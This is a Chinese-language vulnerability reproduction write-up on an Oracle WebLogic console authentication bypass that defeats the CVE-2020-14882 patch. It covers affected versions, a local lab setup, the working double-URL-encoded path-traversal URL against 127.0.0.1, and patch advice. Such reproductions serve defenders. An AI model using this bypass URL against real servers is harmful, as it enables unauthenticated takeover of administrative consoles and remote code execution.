0x01 漏洞概述

Oracle Fusion Middleware（Oracle融合中间件）是美国甲骨文（Oracle）公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。

Oracle WebLogic Server Oracle Fusion Middleware Console 多版本存在安全漏洞，该漏洞是CVE-2020-14882 补丁的绕过，远程攻击者可以构造特殊的 HTTP 请求，在未经身份验证的情况下接管 WebLogic Server Console ，从而执行任意代码。

 

 

0x02 影响版本

 

Oracle:Weblogic : 10.3.6.0.0 12.1.3.0.0 12.2.1.3.0 12.2.1.4.0 14.1.1.0.0

 

 

 

0x03 环境搭建

• windows10 x64
  
• jdk 1.8.0
• WebLogic 12c

 

①下载weblogic 12c

　　https://www.oracle.com/middleware/technologies/fusionmiddleware-downloads.html

 

②安装weblogic 12c

　　1. 使用jdk1.8打开下载的fmw_12.1.3.0.0_wls.jar开始安装

　　　　安装过程参考了博客

　　　　https://www.cnblogs.com/smile502/p/12784978.html

 

　　2. 安装完在目录下运行startWebLogic.cmd

 

③启动完毕后在浏览器访问

　　

 

 

 

0x04 漏洞复现

①观察正常成功登陆的页面URL（默认账号密码weblogic/weblogic）

　　http://127.0.0.1:7001/console/console.portal?_nfpb=true&_pageLabel=HomePage1

 

 

②构造URL绕过登陆

　　http://127.0.0.1:7001/console/images/%252E./console.portal

　　这里的%252E是 . 二次url编码的结果

　　成功绕过登陆：

　　

 

 

 0x05 修复建议

　　下载官方补丁进行修复

　　https://www.oracle.com/security-alerts/alert-cve-2020-14750.html